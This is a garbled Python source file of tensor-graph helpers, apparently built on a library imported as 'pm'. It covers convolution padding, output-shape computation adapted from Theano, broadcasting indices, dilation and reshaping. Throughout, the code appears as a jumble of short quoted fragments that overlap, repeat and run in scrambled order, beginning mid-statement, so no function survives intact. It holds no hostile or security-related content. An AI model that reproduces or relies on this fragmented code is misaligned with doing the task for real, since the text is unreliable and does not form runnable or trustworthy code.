1) // 2 return pad_top, pad_left, pad_h - pad_top, pad_w -", "= data[(n_idx, c_idx, ih_idx, iw_idx)] return padded_out def reshape_node(data: pm.Node, reshaped_out: pm.Node, shape:", "kernel) oh = data.shape[2] + p_top + p_bottom ow = data.shape[3] + p_left", "return idx def _dim_explicit(a_shp, dim): if dim is None: return dim if dim", "the output shape of convolution operation. Copied and simplified from Theano (2020/11/08): https://github.com/Theano/Theano/blob/master/theano/tensor/nnet/abstract_conv.py", "> len(node_b.shape): small_node = node_b lg_node = node_a nmap[\"small\"] = b_idx nmap[\"large\"] =", "node_c.shape: idx = pm.index(0, s - 1) out_idx.append(idx) if s in node_a.shape: start", "small_node = node_b lg_node = node_a nmap[\"small\"] = b_idx nmap[\"large\"] = a_idx else:", "out_idx = [] nmap = {} reverse = True if not broadcastable: reverse", "if i == 1: op1.append(0) # all_ops.append(0) else: idx = pm.index(0, i -", "# STEP 0: idx3*1 + 0 # STEP 1: idx3 + shape[3]* for", "else: return False return True # Use numpy broadcasting rules def _get_elem_indices(node_a, node_b,", "for a, b in zip(shp1[::-1], shp2[::-1]): if a == 1 or b ==", "s in data.shape: idx = pm.index(0, s-1) src_indices.append(idx) # STEP 0: idx3*1 +", "pad_l = pad_r = border_mode # In case of symbolic shape, we want", "pad_top : int Padding size on top pad_left : int Padding size on", "1 elif border_mode == \"valid\": pad_l = pad_r = 0 else: assert border_mode", "three elements respectively correspond to the subsampling on height and width (and possibly", "2 pad_top = (pad_h + 1) // 2 pad_left = (pad_w + 1)", "if a == 1 or b == 1 or a == b: pass", "= image_shape - dil_kernel_shape if pad_l != 0: out_shp += pad_l if pad_r", "() shape_idx = () for i in range(n): out_shape += ((var.shape[i] - 1)", "return False return True # Use numpy broadcasting rules def _get_elem_indices(node_a, node_b, node_c,", "a_map[s] sidx = node_a.shape.index(s, start) a_idx[sidx] = idx a_map[s] = sidx if s", "of output channels, number of input channels, height and width (and possibly depth)", "shape = node.shape indices = tuple([pm.index(0, s - 1) for s in shape])", "of int corresponding to the input image shape. Its four (or five) element", "Its four (or five) element must correspond respectively to: batch size, number of", "must correspond to the subsampling on the considered axis. dilation: int. It must", "return format_idx(a_idx, reverse), format_idx(b_idx, reverse), format_idx(out_idx, reverse) def dilate(var: pm.placeholder, strides, name=None): n", "s in node_b.shape: start = 0 if s in b_map: start = b_map[s]", "for i in range(-1, -len(lg_node.shape) - 1, -1): if len(small_node.shape) < abs(i): idx", "convolution operation. Copied and simplified from theano (2020/11/08): https://github.com/Theano/Theano/blob/master/theano/tensor/nnet/abstract_conv.py Parameters ---------- image_shape: int", "isinstance(pad_size, (tuple, list)): # if len(pad_size) == 2: # pad_h = pad_size[0] *", "on height and width (and possibly depth) axis. subsample: tuple of int. Its", "i in node_a.shape: idx = node_a.shape.index(i) op2.append(op1[idx]) elif i == 1: op2.append(0) #", "enumerate(all_indices): if len(node.shape) > idx and tgt_shape[idx] == node.shape[idx]: indices.append(i) if tgt_shape !=", "= is_broadcastable(node_a.shape, node_b.shape) a_idx = [] b_idx = [] out_idx = [] nmap", "reshaped_out: pm.Node, shape: tuple, dim_combinations): assert np.prod(data.shape) == np.prod(shape) assert len(dim_combinations) == len(shape)", "axis. Returns ------- output_shape: tuple of int corresponding to the output image shape.", "sidx for i in range(len(a_idx)): if a_idx[i] is None: assert node_a.shape[i] == 1", "pm.index(0, s-1) src_indices.append(idx) # STEP 0: idx3*1 + 0 # STEP 1: idx3", "1) * dilation + 1 if border_mode == \"full\": pad_l = pad_r =", "batch size, number of output channels, height and width of the image. \"\"\"", "TODO: Figure out what to do about multiple dimensions with the same value", ": tuple of int Conv kernel size Returns ------- pad_top : int Padding", "else: return tuple(x) def _get_indices(node, all_indices, tgt_shape): indices = [] if node.shape ==", "for s in output.shape]) return indices def is_broadcastable(shp1, shp2): for a, b in", "data.shape[0]-1) c_idx = pm.index(0, data.shape[1]-1) oh_idx = pm.index(0, oh-1) ih_idx = pm.index(0, data.shape[2]-1)", "== 1: idx = pm.index(0, node_b.shape[i] - 1) if zero_indices: a_idx.append(0) # TESTING", "pm.index(0, i - 1) op1.append(idx) all_ops.append(idx) cnt += 1 for i in node_b.shape:", "shape[3]* for dc in reversed(dim_combinations): idx = 0 idx_offset = 1 add_dim =", "code to get the pad option Parameters ---------- padding : int or str", "It must correspond to the dilation on the considered axis. Returns ------- out_shp:", "+ 1) // 2 # return pad_top, pad_left, pad_h - pad_top, pad_w -", "1) op2.append(idx) all_ops.append(idx) cnt += 1 if out_node.is_shape_finalized(): all_ops = [] for s", "== np.prod(shape) assert len(dim_combinations) == len(shape) src_indices = [] dst_indices = [] for", "three elements correspond respectively to the dilation on height and width axis. Returns", "int corresponding to the output image shape. Its four element must correspond respectively", "op2 = [] all_ops = [] for i in node_a.shape: if i ==", "format_idx(out_idx, reverse) def dilate(var: pm.placeholder, strides, name=None): n = len(var.shape) assert len(strides) ==", "node_a.shape[i] != 1: idx = pm.index(0, node_a.shape[i] - 1) a_idx.append(idx) b_idx.append(idx) out_idx.append(idx) elif", "i in range(-1, -len(lg_node.shape) - 1, -1): if len(small_node.shape) < abs(i): idx =", "\"valid\": pad_l = pad_r = 0 else: assert border_mode >= 0 pad_l =", "assert len(data.shape) == 4 p_top, p_bottom, p_left, p_right = get_pad_tuple(pad_size, kernel) oh =", "given axis. border_mode: string or int. If it is a string, it must", "out_shape += ((var.shape[i] - 1) * strides[i] + 1,) nz_indices += (pm.index(0, out_shape[i]", "_get_binop_idx(node_a, node_b, out_node): # TODO: Figure out what to do about multiple dimensions", "idx = pm.index(0, s - 1) out_idx.append(idx) if s in node_a.shape: start =", "format_idx([]) return idx, idx, idx elif node_a.shape == pm.DEFAULT_SHAPES[0]: idx = format_idx([]) indices", "b_idx for i in range(-1, -len(lg_node.shape) - 1, -1): if len(small_node.shape) < abs(i):", "= pm.index(0, s - 1) out_idx.append(idx) if s in node_a.shape: start = 0", "indices.append(i) if tgt_shape != node.shape: for idx, i in enumerate(node.shape): if i !=", "{} b_map = {} for s in node_c.shape: idx = pm.index(0, s -", "if node_a.shape == node_b.shape and node_c.shape == node_a.shape: indices = _get_single_node_indices(node_a) return indices,", "p_left, p_right = get_pad_tuple(pad_size, kernel) oh = data.shape[2] + p_top + p_bottom ow", "node_b.shape[i] - 1) if zero_indices: a_idx.append(0) # TESTING b_idx.append(idx) out_idx.append(idx) elif node_b.shape[i] ==", "If it is a string, it must be 'valid' or 'full'. If it", "node.shape indices = tuple([pm.index(0, s - 1) for s in shape]) return indices", "4: # return pad_size[0], pad_size[2], pad_size[1], pad_size[3] # else: # raise ValueError(\"Size of", "node_b.shape[i] == 1: idx = pm.index(0, node_a.shape[i] - 1) a_idx.append(idx) if zero_indices: b_idx.append(0)", "def get_pad_tuple(pad_size): # if isinstance(pad_size, (tuple, list)): # if len(pad_size) == 2: #", "pm.DEFAULT_SHAPES[0]: idx = format_idx([]) indices = _get_single_node_indices(node_b) return idx, indices, indices elif node_b.shape", "tuple, dim_combinations): assert np.prod(data.shape) == np.prod(shape) assert len(dim_combinations) == len(shape) src_indices = []", "of input channels, height and width (and possibly depth) of the image. None", "indices elif node_b.shape == pm.DEFAULT_SHAPES[0]: idx = format_idx([]) indices = _get_single_node_indices(node_a) return indices,", "= pm.index(0, i - 1) op2.append(idx) all_ops.append(idx) cnt += 1 if out_node.is_shape_finalized(): all_ops", "elif i == 1: op2.append(0) # all_ops.append(0) else: idx = pm.index(0, i -", "= [] op2 = [] all_ops = [] for i in node_a.shape: if", "s in node_b.shape, f\"Output shape value {s} not in other shapes\" idx =", "node_a.shape[i] == 1: idx = pm.index(0, node_b.shape[i] - 1) if zero_indices: a_idx.append(0) #", "indices = _get_single_node_indices(node_a) return indices, idx, indices if len(node_a.shape) > len(node_b.shape): small_node =", "src_indices[d]*idx_offset + add_dim idx_offset = data.shape[d] def _get_indices_for_dim(x, dim): assert len(x.shape) < dim", "== n out_shape = () nz_indices = () shape_idx = () for i", "in range(-1, -len(lg_node.shape) - 1, -1): if len(small_node.shape) < abs(i): idx = pm.index(0,", "== b: pass else: return False return True # Use numpy broadcasting rules", "+ p_top, iw_idx + p_left)] = data[(n_idx, c_idx, ih_idx, iw_idx)] return padded_out def", "get_pad_tuple(pad_size, kernel) oh = data.shape[2] + p_top + p_bottom ow = data.shape[3] +", "int Padding size on top pad_left : int Padding size on left pad_down", "len(x.shape) < dim idx = pm.index(0, x.shape[dim] - 1) return idx def _dim_explicit(a_shp,", "right. \"\"\" # pad_h = pad_w = padding * 2 pad_h = padding[0]", "in node_b.shape: if i in node_a.shape: idx = node_a.shape.index(i) op2.append(op1[idx]) elif i ==", "get_pad_tuple(pad_size): # if isinstance(pad_size, (tuple, list)): # if len(pad_size) == 2: # pad_h", "iw_idx)] return padded_out def reshape_node(data: pm.Node, reshaped_out: pm.Node, shape: tuple, dim_combinations): assert np.prod(data.shape)", "= format_idx([]) return idx, idx, idx elif node_a.shape == pm.DEFAULT_SHAPES[0]: idx = format_idx([])", "and width (and possibly depth) axis. filter_dilation: tuple of int. Its two or", "to do about multiple dimensions with the same value cnt = 0 op1", "\"\"\" bsize, imshp = image_shape[0], image_shape[2:] convdim = len(image_shape) - 2 nkern, kshp", "\"\"\" # pad_h = pad_w = padding * 2 pad_h = padding[0] *", "all_ops.append(idx) else: assert s in node_b.shape, f\"Output shape value {s} not in other", "kernel_shape, border_mode, subsample, filter_dilation=(0, 0) ): \"\"\"This function compute the output shape of", "channels, height and width (and possibly depth) of the kernel. For an unshared", "for i in range(len(b_idx)): if b_idx[i] is None: assert node_b.shape[i] == 1 b_idx[i]", "all_ops.append(idx) return op1, op2, all_ops def _get_single_node_indices(node, shape=None): if node.shape == pm.DEFAULT_SHAPES[0]: return", "pad_h = pad_w = pad_size * 2 # # pad_top = (pad_h +", "s in a_map: start = a_map[s] sidx = node_a.shape.index(s, start) a_idx[sidx] = idx", "kernel_shape: int Corresponds to the kernel shape on a given axis. border_mode: string", "+ 1) // 2 # pad_left = (pad_w + 1) // 2 #", "is None: assert node_a.shape[i] == 1 a_idx[i] = 0 for i in range(len(b_idx)):", "in b_map: start = b_map[s] sidx = node_b.shape.index(s, start) b_idx[sidx] = idx b_map[s]", "three) elements respectively correspond to the padding on height and width (and possibly", "out_node.shape: if s in node_a.shape: idx = node_a.shape.index(s) all_ops.append(idx) else: assert s in", "to the dilation on the considered axis. Returns ------- out_shp: int corresponding to", "broadcastable: reverse = False a_idx = [None] * len(node_a.shape) b_idx = [None] *", "correspond respectively to: batch size, number of input channels, height and width (and", "if isinstance(pad_size, (tuple, list)): # if len(pad_size) == 2: # pad_h = pad_size[0]", "node_b.shape and node_c.shape == node_a.shape: indices = _get_single_node_indices(node_a) return indices, indices, indices elif", "in a_map: start = a_map[s] sidx = node_a.shape.index(s, start) a_idx[sidx] = idx a_map[s]", "as pm import numpy as np def format_idx(x, reverse=True): if reverse: return tuple(list(reversed(x)))", "element must correspond respectively to: batch size, number of output channels, height and", "0 op1 = [] op2 = [] all_ops = [] for i in", "_get_reduce_node_indices(a, b, output, axis): if output.shape == pm.DEFAULT_SHAPES[0]: return tuple([]) else: if not", "to the padding on height and width (and possibly depth) axis. subsample: tuple", "operation. Copied and simplified from theano (2020/11/08): https://github.com/Theano/Theano/blob/master/theano/tensor/nnet/abstract_conv.py Parameters ---------- image_shape: int Corresponds", "idx = node_a.shape.index(s) all_ops.append(idx) else: assert s in node_b.shape, f\"Output shape value {s}", "b_idx nmap[\"large\"] = a_idx else: small_node = node_a lg_node = node_b nmap[\"small\"] =", "idx = format_idx([]) indices = _get_single_node_indices(node_a) return indices, idx, indices if len(node_a.shape) >", "2: # pad_h = pad_size[0] * 2 # pad_w = pad_size[1] * 2", "and width of the kernel. None where undefined. border_mode: string, or tuple of", "1) if zero_indices: a_idx.append(0) # TESTING b_idx.append(idx) out_idx.append(idx) elif node_b.shape[i] == 1: idx", "pm.index(0, i - 1) op2.append(idx) all_ops.append(idx) cnt += 1 if out_node.is_shape_finalized(): all_ops =", "+ shape[3]* for dc in reversed(dim_combinations): idx = 0 idx_offset = 1 add_dim", "dim_combinations): assert np.prod(data.shape) == np.prod(shape) assert len(dim_combinations) == len(shape) src_indices = [] dst_indices", "0 if s in b_map: start = b_map[s] sidx = node_b.shape.index(s, start) b_idx[sidx]", "pad_val padded_out[(n_idx, c_idx, ih_idx + p_top, iw_idx + p_left)] = data[(n_idx, c_idx, ih_idx,", ": int or str Padding size, or ['VALID', 'SAME'] kernel : tuple of", "c_idx, ih_idx, iw_idx)] return padded_out def reshape_node(data: pm.Node, reshaped_out: pm.Node, shape: tuple, dim_combinations):", "for s in node_c.shape: idx = pm.index(0, s - 1) out_idx.append(idx) if s", "* strides[i] + 1,) nz_indices += (pm.index(0, out_shape[i] - 1, stride=strides[i]),) shape_idx +=", "(kernel_shape - 1) * dilation + 1 if border_mode == \"full\": pad_l =", "respectively to: batch size, number of output channels, height and width of the", "= [] for i in node_a.shape: if i == 1: op1.append(0) # all_ops.append(0)", "given axis. kernel_shape: int Corresponds to the kernel shape on a given axis.", "int corresponding to the kernel shape. For a normal convolution, its four (for", "int Corresponds to the input image shape on a given axis. kernel_shape: int", "shape value {s} not in other shapes\" idx = node_b.shape.index(s) all_ops.append(idx) return op1,", "= {} for s in node_c.shape: idx = pm.index(0, s - 1) out_idx.append(idx)", "pad_top, pad_w - pad_left def get_pad_tuple(padding, kernel): \"\"\"Common code to get the pad", "0: out_shp += pad_l if pad_r != 0: out_shp += pad_r if subsample", "on height and width (and possibly depth) axis. filter_dilation: tuple of int. Its", "zero_indices=True): broadcastable = is_broadcastable(node_a.shape, node_b.shape) a_idx = [] b_idx = [] out_idx =", "= node_b.shape.index(s) all_ops.append(idx) return op1, op2, all_ops def _get_single_node_indices(node, shape=None): if node.shape ==", "[] all_ops = [] for i in node_a.shape: if i == 1: op1.append(0)", "a_idx nmap[\"large\"] = b_idx for i in range(-1, -len(lg_node.shape) - 1, -1): if", "[None] * len(node_a.shape) b_idx = [None] * len(node_b.shape) a_map = {} b_map =", "= 0 padded[(shape_idx[0])] = 0 # def get_pad_tuple(pad_size): # if isinstance(pad_size, (tuple, list)):", "padding[0] * 2 pad_w = padding[1] * 2 pad_top = (pad_h + 1)", "convolution) or five (for 3D convolution) elements must correspond respectively to : number", "RuntimeError(f\"Unable to broadcast indices:\\n\" f\"{node_a.name}: {node_a.shape}\\n\" f\"{node_b.name}: {node_b.shape}\\n\") return format_idx(a_idx, reverse), format_idx(b_idx, reverse),", "strides[i] + 1,) nz_indices += (pm.index(0, out_shape[i] - 1, stride=strides[i]),) shape_idx += (pm.index(0,", "to : number of output channels, number of input channels, height and width", "axis. \"\"\" # Implicit dilated kernel shape dil_kernel_shape = (kernel_shape - 1) *", "True # Use numpy broadcasting rules def _get_elem_indices(node_a, node_b, node_c, zero_indices=True): broadcastable =", "if output.shape == pm.DEFAULT_SHAPES[0]: return tuple([]) else: if not output.shape: raise RuntimeError indices", "size, or ['VALID', 'SAME'] kernel : tuple of int Conv kernel size Returns", "int Conv kernel size Returns ------- pad_top : int Padding size on top", "2 pad_w = padding[1] * 2 pad_top = (pad_h + 1) // 2", "oh = data.shape[2] + p_top + p_bottom ow = data.shape[3] + p_left +", "format_idx(x, reverse=True): if reverse: return tuple(list(reversed(x))) else: return tuple(x) def _get_indices(node, all_indices, tgt_shape):", "+ dim return dim def _get_conv_shape_1axis( image_shape, kernel_shape, border_mode, subsample, dilation=1 ): \"\"\"This", "node_a.shape.index(i) op2.append(op1[idx]) elif i == 1: op2.append(0) # all_ops.append(0) else: idx = pm.index(0,", "1) for s in output.shape]) return indices def is_broadcastable(shp1, shp2): for a, b", "* len(node_a.shape) b_idx = [None] * len(node_b.shape) a_map = {} b_map = {}", "data.shape[3] + p_left + p_right padded_shape = (data.shape[0], data.shape[1], oh, ow) if padded_out.is_shape_finalized()", "image shape. Its four (or five) element must correspond respectively to: batch size,", "if s in node_a.shape: start = 0 if s in a_map: start =", "def dilate(var: pm.placeholder, strides, name=None): n = len(var.shape) assert len(strides) == n out_shape", "two (or three) elements respectively correspond to the padding on height and width", "four element must correspond respectively to: batch size, number of output channels, height", "subsample: tuple of int. Its two or three elements respectively correspond to the", "idx3 + shape[3]* for dc in reversed(dim_combinations): idx = 0 idx_offset = 1", "assert node_b.shape[i] == 1 b_idx[i] = 0 else: if node_a.shape == node_b.shape and", "padding[1] * 2 pad_top = (pad_h + 1) // 2 pad_left = (pad_w", "None where undefined. kernel_shape: tuple of int corresponding to the kernel shape. For", "out_shape = () nz_indices = () shape_idx = () for i in range(n):", "# pad_h = pad_w = padding * 2 pad_h = padding[0] * 2", "and simplified from Theano (2020/11/08): https://github.com/Theano/Theano/blob/master/theano/tensor/nnet/abstract_conv.py Parameters ---------- image_shape: tuple of int corresponding", "c_idx, ih_idx + p_top, iw_idx + p_left)] = data[(n_idx, c_idx, ih_idx, iw_idx)] return", "raise ValueError(\"Size of padding can only be 2 or 4\") # else: #", "= tuple([pm.index(0, s - 1) for s in shape]) return indices def _get_reduce_node_indices(a,", "node_a.shape[i] - 1) a_idx.append(idx) if zero_indices: b_idx.append(0) # TESTING out_idx.append(idx) else: raise RuntimeError(f\"Unable", "if s in node_a.shape: idx = node_a.shape.index(s) all_ops.append(idx) else: assert s in node_b.shape,", "correspond to the padding on height and width (and possibly depth) axis. subsample:", "indices def is_broadcastable(shp1, shp2): for a, b in zip(shp1[::-1], shp2[::-1]): if a ==", "op1 = [] op2 = [] all_ops = [] for i in node_a.shape:", "return tuple(x) def _get_indices(node, all_indices, tgt_shape): indices = [] if node.shape == pm.DEFAULT_SHAPES[0]:", "_get_conv_output_shape( image_shape, kernel_shape, border_mode, subsample, filter_dilation=(0, 0) ): \"\"\"This function compute the output", "be 2 or 4\") # else: # assert isinstance(pad_size, int) # pad_h =", "= pm.index(0, node_b.shape[i] - 1) if zero_indices: a_idx.append(0) # TESTING b_idx.append(idx) out_idx.append(idx) elif", "b, output, axis): if output.shape == pm.DEFAULT_SHAPES[0]: return tuple([]) else: if not output.shape:", "s in b_map: start = b_map[s] sidx = node_b.shape.index(s, start) b_idx[sidx] = idx", "= idx a_map[s] = sidx if s in node_b.shape: start = 0 if", "(for 2D convolution) or five (for 3D convolution) elements must correspond respectively to", "two or three elements respectively correspond to the subsampling on height and width", "kernel shape on a given axis. border_mode: string or int. If it is", "def _dim_explicit(a_shp, dim): if dim is None: return dim if dim < 0:", "in range(len(b_idx)): if b_idx[i] is None: assert node_b.shape[i] == 1 b_idx[i] = 0", "def get_pad_tuple(padding, kernel): \"\"\"Common code to get the pad option Parameters ---------- padding", "pad_right : int Padding size on right. \"\"\" # pad_h = pad_w =", "elements respectively correspond to the padding on height and width (and possibly depth)", "in data.shape: idx = pm.index(0, s-1) src_indices.append(idx) # STEP 0: idx3*1 + 0", "pad_left = (pad_w + 1) // 2 # return pad_top, pad_left, pad_h -", "# Use numpy broadcasting rules def _get_elem_indices(node_a, node_b, node_c, zero_indices=True): broadcastable = is_broadcastable(node_a.shape,", "= data.shape[2] + p_top + p_bottom ow = data.shape[3] + p_left + p_right", "f\"{node_a.name}: {node_a.shape}\\n\" f\"{node_b.name}: {node_b.shape}\\n\") return format_idx(a_idx, reverse), format_idx(b_idx, reverse), format_idx(out_idx, reverse) def dilate(var:", "out_shape[i] - 1),) padded = pm.temp(name=name, shape=out_shape) padded[shape_idx] = 0 padded[(shape_idx[0])] = 0", "< 0: dim = len(a_shp) + dim return dim def _get_conv_shape_1axis( image_shape, kernel_shape,", "= node_a.shape.index(s) all_ops.append(idx) else: assert s in node_b.shape, f\"Output shape value {s} not", "its six channels must correspond to : number of output channels, height and", "len(node_a.shape) b_idx = [None] * len(node_b.shape) a_map = {} b_map = {} for", "must correspond to the dilation on the considered axis. Returns ------- out_shp: int", "image shape on a given axis. kernel_shape: int Corresponds to the kernel shape", "lg_node = node_b nmap[\"small\"] = a_idx nmap[\"large\"] = b_idx for i in range(-1,", "pad_left : int Padding size on left pad_down : int Padding size on", "idx, idx, idx elif node_a.shape == pm.DEFAULT_SHAPES[0]: idx = format_idx([]) indices = _get_single_node_indices(node_b)", "1, -1): if len(small_node.shape) < abs(i): idx = pm.index(0, lg_node.shape[i] - 1) nmap[\"large\"].append(idx)", "RuntimeError indices = tuple([pm.index(0, s - 1) for s in output.shape]) return indices", "possibly depth) of the kernel. For an unshared 2D convolution, its six channels", "!= 0: out_shp += pad_l if pad_r != 0: out_shp += pad_r if", "on top pad_left : int Padding size on left pad_down : int Padding", "pad_l = pad_r = dil_kernel_shape - 1 elif border_mode == \"valid\": pad_l =", "all_ops.append(0) else: idx = pm.index(0, i - 1) op1.append(idx) all_ops.append(idx) cnt += 1", "1 return out_shp def _get_conv_output_shape( image_shape, kernel_shape, border_mode, subsample, filter_dilation=(0, 0) ): \"\"\"This", "'SAME'] kernel : tuple of int Conv kernel size Returns ------- pad_top :", "_dim_explicit(a_shp, dim): if dim is None: return dim if dim < 0: dim", "pad_r = 0 else: assert border_mode >= 0 pad_l = pad_r = border_mode", "True if not broadcastable: reverse = False a_idx = [None] * len(node_a.shape) b_idx", "to the output image shape on the considered axis. \"\"\" # Implicit dilated", "c_idx, oh_idx, ow_idx)] = pad_val padded_out[(n_idx, c_idx, ih_idx + p_top, iw_idx + p_left)]", "== 2: # pad_h = pad_size[0] * 2 # pad_w = pad_size[1] *", "b_idx[i] = 0 else: if node_a.shape == node_b.shape and node_c.shape == node_a.shape: indices", "shape. Its four element must correspond respectively to: batch size, number of output", "= 0 else: if node_a.shape == node_b.shape and node_c.shape == node_a.shape: indices =", "// 2 pad_left = (pad_w + 1) // 2 return pad_top, pad_left, pad_h", "pad_w = pad_size * 2 # # pad_top = (pad_h + 1) //", "src_indices.append(idx) # STEP 0: idx3*1 + 0 # STEP 1: idx3 + shape[3]*", "len(node_b.shape): small_node = node_b lg_node = node_a nmap[\"small\"] = b_idx nmap[\"large\"] = a_idx", "b_idx[i] is None: assert node_b.shape[i] == 1 b_idx[i] = 0 else: if node_a.shape", "node_b.shape, f\"Output shape value {s} not in other shapes\" idx = node_b.shape.index(s) all_ops.append(idx)", "five (for 3D convolution) elements must correspond respectively to : number of output", "s - 1) for s in output.shape]) return indices def is_broadcastable(shp1, shp2): for", "pm.index(0, data.shape[1]-1) oh_idx = pm.index(0, oh-1) ih_idx = pm.index(0, data.shape[2]-1) ow_idx = pm.index(0,", "Its two or three elements correspond respectively to the dilation on height and", "padded[(shape_idx[0])] = 0 # def get_pad_tuple(pad_size): # if isinstance(pad_size, (tuple, list)): # if", "// subsample out_shp = out_shp + 1 return out_shp def _get_conv_output_shape( image_shape, kernel_shape,", "= data.shape[3] + p_left + p_right padded_shape = (data.shape[0], data.shape[1], oh, ow) if", "pm.index(0, oh-1) ih_idx = pm.index(0, data.shape[2]-1) ow_idx = pm.index(0, ow-1) iw_idx = pm.index(0,", "tuple( _get_conv_shape_1axis( imshp[i], kshp[i], border_mode, subsample[i], filter_dilation[i] ) for i in range(len(subsample)) )", "of the kernel. None where undefined. border_mode: string, or tuple of int. If", "for i in node_b.shape: if i in node_a.shape: idx = node_a.shape.index(i) op2.append(op1[idx]) elif", "if tgt_shape != node.shape: for idx, i in enumerate(node.shape): if i != tgt_shape[idx]:", "_get_conv_shape_1axis( image_shape, kernel_shape, border_mode, subsample, dilation=1 ): \"\"\"This function compute the output shape", "image shape on the considered axis. \"\"\" # Implicit dilated kernel shape dil_kernel_shape", "------- output_shape: tuple of int corresponding to the output image shape. Its four", "convolution operation. Copied and simplified from Theano (2020/11/08): https://github.com/Theano/Theano/blob/master/theano/tensor/nnet/abstract_conv.py Parameters ---------- image_shape: tuple", "corresponding to the output image shape. Its four element must correspond respectively to:", "2 nkern, kshp = kernel_shape[0], kernel_shape[-convdim:] if isinstance(border_mode, tuple): out_shp = tuple( _get_conv_shape_1axis(", "subsample: int. It must correspond to the subsampling on the considered axis. dilation:", "= _get_single_node_indices(node_a) return indices, idx, indices if len(node_a.shape) > len(node_b.shape): small_node = node_b", "# pad_top = (pad_h + 1) // 2 # pad_left = (pad_w +", "_get_single_node_indices(node_a) return indices, idx, indices if len(node_a.shape) > len(node_b.shape): small_node = node_b lg_node", "simplified from theano (2020/11/08): https://github.com/Theano/Theano/blob/master/theano/tensor/nnet/abstract_conv.py Parameters ---------- image_shape: int Corresponds to the input", "= b_idx nmap[\"large\"] = a_idx else: small_node = node_a lg_node = node_b nmap[\"small\"]", "a tuple, its two (or three) elements respectively correspond to the padding on", "if node.shape == pm.DEFAULT_SHAPES[0]: return tuple(indices) for idx, i in enumerate(all_indices): if len(node.shape)", "cnt += 1 if out_node.is_shape_finalized(): all_ops = [] for s in out_node.shape: if", "op2.append(idx) all_ops.append(idx) cnt += 1 if out_node.is_shape_finalized(): all_ops = [] for s in", "_get_elem_indices(node_a, node_b, node_c, zero_indices=True): broadcastable = is_broadcastable(node_a.shape, node_b.shape) a_idx = [] b_idx =", "If it is a string, it must be 'valid' or 'full'. subsample: int.", "return out_shp def _get_conv_output_shape( image_shape, kernel_shape, border_mode, subsample, filter_dilation=(0, 0) ): \"\"\"This function", "idx and tgt_shape[idx] == node.shape[idx]: indices.append(i) if tgt_shape != node.shape: for idx, i", "{node_a.shape}\\n\" f\"{node_b.name}: {node_b.shape}\\n\") return format_idx(a_idx, reverse), format_idx(b_idx, reverse), format_idx(out_idx, reverse) def dilate(var: pm.placeholder,", "four (or five) element must correspond respectively to: batch size, number of input", "in node_c.shape: idx = pm.index(0, s - 1) out_idx.append(idx) if s in node_a.shape:", "output image shape on the considered axis. \"\"\" # Implicit dilated kernel shape", "kernel_shape[-convdim:] if isinstance(border_mode, tuple): out_shp = tuple( _get_conv_shape_1axis( imshp[i], kshp[i], border_mode[i], subsample[i], filter_dilation[i],", "False a_idx = [None] * len(node_a.shape) b_idx = [None] * len(node_b.shape) a_map =", "shape=None): if node.shape == pm.DEFAULT_SHAPES[0]: return tuple([]) else: if not shape: shape =", ": number of output channels, number of input channels, height and width (and", "in range(len(subsample)) ) else: out_shp = tuple( _get_conv_shape_1axis( imshp[i], kshp[i], border_mode, subsample[i], filter_dilation[i]", "indices = tuple([pm.index(0, s - 1) for s in shape]) return indices def", "element must correspond respectively to: batch size, number of input channels, height and", "sidx if s in node_b.shape: start = 0 if s in b_map: start", "Parameters ---------- image_shape: int Corresponds to the input image shape on a given", "sidx = node_a.shape.index(s, start) a_idx[sidx] = idx a_map[s] = sidx if s in", "channels, height and width (and possibly depth) of the image. None where undefined.", "1, stride=strides[i]),) shape_idx += (pm.index(0, out_shape[i] - 1),) padded = pm.temp(name=name, shape=out_shape) padded[shape_idx]", "on down. pad_right : int Padding size on right. \"\"\" # pad_h =", "node.shape == pm.DEFAULT_SHAPES[0]: return tuple(indices) for idx, i in enumerate(all_indices): if len(node.shape) >", "pad_left, pad_h - pad_top, pad_w - pad_left def get_pad_tuple(padding, kernel): \"\"\"Common code to", "== 1 or b == 1 or a == b: pass else: return", "= src_indices[d]*idx_offset + add_dim idx_offset = data.shape[d] def _get_indices_for_dim(x, dim): assert len(x.shape) <", "pass else: return False return True # Use numpy broadcasting rules def _get_elem_indices(node_a,", "- 1) a_idx.append(idx) if zero_indices: b_idx.append(0) # TESTING out_idx.append(idx) else: raise RuntimeError(f\"Unable to", "assert s in node_b.shape, f\"Output shape value {s} not in other shapes\" idx", "Corresponds to the input image shape on a given axis. kernel_shape: int Corresponds", "padded[shape_idx] = 0 padded[(shape_idx[0])] = 0 # def get_pad_tuple(pad_size): # if isinstance(pad_size, (tuple,", "'full'. If it is a tuple, its two (or three) elements respectively correspond", "ih_idx, iw_idx)] return padded_out def reshape_node(data: pm.Node, reshaped_out: pm.Node, shape: tuple, dim_combinations): assert", "dim = len(a_shp) + dim return dim def _get_conv_shape_1axis( image_shape, kernel_shape, border_mode, subsample,", "indices if len(node_a.shape) > len(node_b.shape): small_node = node_b lg_node = node_a nmap[\"small\"] =", "dilation=1 ): \"\"\"This function compute the output shape of convolution operation. Copied and", "kernel shape dil_kernel_shape = (kernel_shape - 1) * dilation + 1 if border_mode", "pad_top, pad_left, pad_h - pad_top, pad_w - pad_left def pad_node(data: pm.Node, padded_out: pm.Node,", "== len(shape) src_indices = [] dst_indices = [] for s in data.shape: idx", "out_shp = tuple( _get_conv_shape_1axis( imshp[i], kshp[i], border_mode[i], subsample[i], filter_dilation[i], ) for i in", "from theano (2020/11/08): https://github.com/Theano/Theano/blob/master/theano/tensor/nnet/abstract_conv.py Parameters ---------- image_shape: int Corresponds to the input image", "= 0 else: assert border_mode >= 0 pad_l = pad_r = border_mode #", "== 1: op2.append(0) # all_ops.append(0) else: idx = pm.index(0, i - 1) op2.append(idx)", "shape_idx = () for i in range(n): out_shape += ((var.shape[i] - 1) *", "== pm.DEFAULT_SHAPES[0]: idx = format_idx([]) return idx, idx, idx elif node_a.shape == pm.DEFAULT_SHAPES[0]:", "shape. For a normal convolution, its four (for 2D convolution) or five (for", "add_dim = 0 for d in reversed(dc): idx = src_indices[d]*idx_offset + add_dim idx_offset", "of convolution operation. Copied and simplified from Theano (2020/11/08): https://github.com/Theano/Theano/blob/master/theano/tensor/nnet/abstract_conv.py Parameters ---------- image_shape:", "number of output channels, height and width of the image. \"\"\" bsize, imshp", "= get_pad_tuple(pad_size, kernel) oh = data.shape[2] + p_top + p_bottom ow = data.shape[3]", "== pm.DEFAULT_SHAPES[0]: return tuple([]) else: if not output.shape: raise RuntimeError indices = tuple([pm.index(0,", "reshape_node(data: pm.Node, reshaped_out: pm.Node, shape: tuple, dim_combinations): assert np.prod(data.shape) == np.prod(shape) assert len(dim_combinations)", "axis. Returns ------- out_shp: int corresponding to the output 